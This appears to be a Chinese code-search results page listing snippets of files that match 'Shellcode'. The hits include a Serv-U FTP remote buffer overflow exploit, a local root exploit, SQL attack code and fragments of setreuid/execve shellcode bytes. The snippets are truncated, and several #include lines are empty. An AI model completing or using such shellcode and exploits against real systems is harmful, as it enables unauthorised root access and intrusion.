代码搜索:Shellcode
找到约 263 项符合「Shellcode」的源代码
代码结果 263
www.eeworm.com/read/117933/14895318
c sql-攻击代码.c
#include
#include
#pragma comment (lib,"Ws2_32")
unsigned int resolve(char *name)
{
struct hostent *he;
unsigned int ip;
{
if
www.eeworm.com/read/114964/15033103
c servu.c
/*
*-----------------------------------------------------------------------
*
* Servu2.c - Serv-U FTPD 2.x/3.x/4.x/5.x "MDTM" Command
* Remote stack buffer overflow exploit
*
* Copyright (C) 20
www.eeworm.com/read/394442/8224303
c exploit1.c
char shellcode[]=
// setreuid(0,0);
"\x31\xc0" // xor %eax,%eax
"\x31\xdb" // xor %ebx,%ebx
"\x31\xc9" // xor %ecx,%ecx
"\xb0\x46" // mov $0x46,%al
"\xcd\x80" // int $0x80
// execve /bi
www.eeworm.com/read/394442/8224307
c exploit2.c
#include
#include
#include
char shellcode[]=
// setreuid(0,0);
"\x31\xc0" // xor %eax,%eax
"\x31\xdb" // xor %ebx,%ebx
"\x31\xc9" // xor %ecx,%ecx
"\xb
www.eeworm.com/read/173059/9676765
txt windows进程中的内存结构.txt
windows进程中的内存结构
来源:网络收集 点击:68748 更新日期:08月23日 02:08
作者:四不象 来源:www.20cn.net
在阅读本文之前,如果你连堆栈是什么多不知道的话,请先阅读文章后面的基础知识。
接触过编程的人都知道,高级语言都能通过变量名来访问内存中的数据。那么这些变量在内存中是如何存放的呢?程序又是如何 ...
www.eeworm.com/read/247748/12621578
txt winshellcode7.txt
******************************************************************************
. Designed for any version NT plamform
. Can reuse port, such as 80
. Can reuse connect, shellcode search valid c
www.eeworm.com/read/108457/15585681
sql-
#include
#include
#pragma comment (lib,"Ws2_32")
unsigned int resolve(char *name)
{
struct hostent *he;
unsigned int ip;
{
if
www.eeworm.com/read/101677/15822346
c sql-攻击代码.c
#include
#include
#pragma comment (lib,"Ws2_32")
unsigned int resolve(char *name)
{
struct hostent *he;
unsigned int ip;
{
if
www.eeworm.com/read/101671/15822411
c pileup-xpl.c
/* pileup-xpl.c - local root exploit
*
* by core
*
* Friday the 13th, July 2001
*
* based almost entirely on code by Cody Tubbs (loophole of hhp)
*
* $ ./pileup-xpl
* pileup-xpl by c